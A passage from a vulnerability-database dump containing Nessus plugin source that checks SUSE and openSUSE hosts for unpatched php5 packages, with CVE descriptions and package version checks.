(rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-debuginfo-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-5.5.14-11.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-debuginfo-5.5.14-11.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:52", "bulletinFamily": "scanner", "description": "php5 was updated to fix five security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap was used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allowed remote\n attackers to obtain sensitive information from php-cgi\n process memory by leveraging the ability to upload a\n .php file or (2) trigger unexpected code execution if a\n valid PHP script is present in memory locations adjacent\n to the mapping (bnc#911664).\n\nFor openSUSE 13.2 this additional security issue was fixed :\n\n - CVE-2014-9426: The apprentice_load function in\n libmagic/apprentice.c in the Fileinfo component in PHP\n through 5.6.4 attempted to perform a free operation on a\n stack-based character array, which allowed remote\n attackers to cause a denial of service (memory\n corruption or application crash) or possibly have\n unspecified other impact via unknown vectors\n (bnc#911663).", "modified": "2015-10-05T00:00:00", "published": "2015-02-20T00:00:00", "id": "OPENSUSE-2015-163.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81418", "title": "openSUSE Security Update : php5 (openSUSE-2015-163)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-163.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81418);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2015/10/05 13:44:22 $\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2014-8142\", \"CVE-2014-9426\", \"CVE-2014-9427\", \"CVE-2015-0231\", \"CVE-2015-0232\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2015-163)\");\n script_summary(english:\"Check for the openSUSE-2015-163 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php5 was updated to fix five security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-0231: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.37,\n 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate numerical keys within the serialized\n properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142\n (bnc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in\n ext/exif/exif.c in PHP before 5.4.37, 5.5.x before\n 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers\n to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bnc#914690).\n\n - CVE-2014-8142: Use-after-free vulnerability in the\n process_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.4.36,\n 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allowed\n remote attackers to execute arbitrary code via a crafted\n unserialize call that leverages improper handling of\n duplicate keys within the serialized properties of an\n object, a different vulnerability than CVE-2004-1019\n (bnc#910659).\n\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component\n in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x\n through 5.6.4, when mmap was used to read a .php file,\n did not properly consider the mapping's length during\n processing of an invalid file that begins with a #\n character and lacks a newline character, which caused an\n out-of-bounds read and might (1) allowed remote\n attackers to obtain sensitive information from php-cgi\n process memory by leveraging the ability to upload a\n .php file or (2) trigger unexpected code execution if a\n valid PHP script is present in memory locations adjacent\n to the mapping (bnc#911664).\n\nFor openSUSE 13.2 this additional security issue was fixed :\n\n - CVE-2014-9426: The apprentice_load function in\n libmagic/apprentice.c in the Fileinfo component in PHP\n through 5.6.4 attempted to perform a free operation on a\n stack-based character array, which allowed remote\n attackers to cause a denial of service (memory\n corruption or application crash) or possibly have\n unspecified other impact via unknown vectors\n (bnc#911663).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=907519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=911663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=911664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914690\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"apache2-mod_php5-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bcmath-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-bz2-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-calendar-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ctype-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-curl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dba-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-debugsource-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-devel-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-dom-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-enchant-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-exif-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fastcgi-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fileinfo-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-firebird-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-fpm-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ftp-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gd-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gettext-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-gmp-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-iconv-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-imap-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-intl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-json-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-ldap-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pear-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 